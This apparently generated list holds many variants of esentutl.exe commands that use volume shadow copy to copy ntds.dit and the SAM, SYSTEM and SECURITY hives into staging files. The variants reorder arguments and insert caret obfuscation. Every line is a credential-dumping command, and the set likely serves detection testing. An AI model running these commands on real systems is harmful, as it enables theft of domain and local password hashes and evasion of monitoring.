ESENTUTL /m C:\Temp\ntds_backup.dit /vss /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m C:\Temp\ntds_backup.dit /vss /y C:/Windows/repair/system
ESENTUTL /m C:\Temp\ntds_backup.dit /vss /y C:\windows\ntds\ntds.dit
ESENTUTL /m C:\Temp\ntds_backup.dit /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
ESENTUTL /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
ESENTUTL /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
ESENTUTL /v^ss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
ESENTUTL /v^ss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
ESENTUTL /v^ss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
ESENTUTL /v^ss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
ESENTUTL /v^ss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
ESENTUTL /v^ss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
ESENTUTL /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
ESENTUTL /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
ESENTUTL /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
ESENTUTL /vss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
ESENTUTL /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
ESENTUTL /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
ESENTUTL /vss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
ESENTUTL /vss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
ESENTUTL /vss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
ESENTUTL /vss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
ESENTUTL /vss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
ESENTUTL /vss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
ESENTUTL /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
ESENTUTL /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
ESENTUTL /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" '/vss'
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /v^ss
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /vss
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive '/vss'
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /v^ss
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /vss
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit '/vss'
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /v^ss
ESENTUTL /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /vss
ESENTUTL /y C:/Windows/repair/system /m "%TEMP%\sam.bak" '/vss'
ESENTUTL /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /v^ss
ESENTUTL /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /vss
ESENTUTL /y C:/Windows/repair/system /m C:\Perflogs\sys.hive '/vss'
ESENTUTL /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /v^ss
ESENTUTL /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /vss
ESENTUTL /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit '/vss'
ESENTUTL /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /v^ss
ESENTUTL /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /vss
ESENTUTL /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" '/vss'
ESENTUTL /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /v^ss
ESENTUTL /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /vss
ESENTUTL /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive '/vss'
ESENTUTL /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /v^ss
ESENTUTL /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /vss
ESENTUTL /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit '/vss'
ESENTUTL /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /v^ss
ESENTUTL /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /vss
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" '/vss'
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /v^ss
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /vss
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive '/vss'
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /v^ss
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /vss
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit '/vss'
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /v^ss
ESENTUTL /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /vss
esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
esentutl.exe '/vss' /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
esentutl.exe '/vss' /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
esentutl.exe '/vss' /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y C:/Windows/repair/system
esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y C:\windows\ntds\ntds.dit
esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y C:/Windows/repair/system
esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y C:\windows\ntds\ntds.dit
esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m "%TEMP%\sam.bak" /vss /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m "%TEMP%\sam.bak" /vss /y C:/Windows/repair/system
esentutl.exe /m "%TEMP%\sam.bak" /vss /y C:\windows\ntds\ntds.dit
esentutl.exe /m "%TEMP%\sam.bak" /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y C:/Windows/repair/system
esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y C:\windows\ntds\ntds.dit
esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y C:/Windows/repair/system
esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y C:\windows\ntds\ntds.dit
esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m C:\Perflogs\sys.hive /vss /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m C:\Perflogs\sys.hive /vss /y C:/Windows/repair/system
esentutl.exe /m C:\Perflogs\sys.hive /vss /y C:\windows\ntds\ntds.dit
esentutl.exe /m C:\Perflogs\sys.hive /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y C:/Windows/repair/system
esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y C:\windows\ntds\ntds.dit
esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y C:/Windows/repair/system
esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y C:\windows\ntds\ntds.dit
esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y "%SystemRoot%\System32\config\RegBack\security"
esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y C:/Windows/repair/system
esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y C:\windows\ntds\ntds.dit
esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
esentutl.exe /v^ss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
esentutl.exe /v^ss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
esentutl.exe /v^ss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
esentutl.exe /vss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
esentutl.exe /vss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
esentutl.exe /vss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" '/vss'
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /v^ss
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /vss
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive '/vss'
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /v^ss
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /vss
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit '/vss'
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /v^ss
esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /vss
esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" '/vss'
esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /v^ss
esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /vss
esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive '/vss'
esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /v^ss
esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /vss
esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit '/vss'
esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /v^ss
esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /vss
esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" '/vss'
esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /v^ss
esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /vss
esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive '/vss'
esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /v^ss
esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /vss
esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit '/vss'
esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /v^ss
esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /vss
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" '/vss'
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /v^ss
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /vss
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive '/vss'
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /v^ss
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /vss
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit '/vss'
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /v^ss
esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /vss
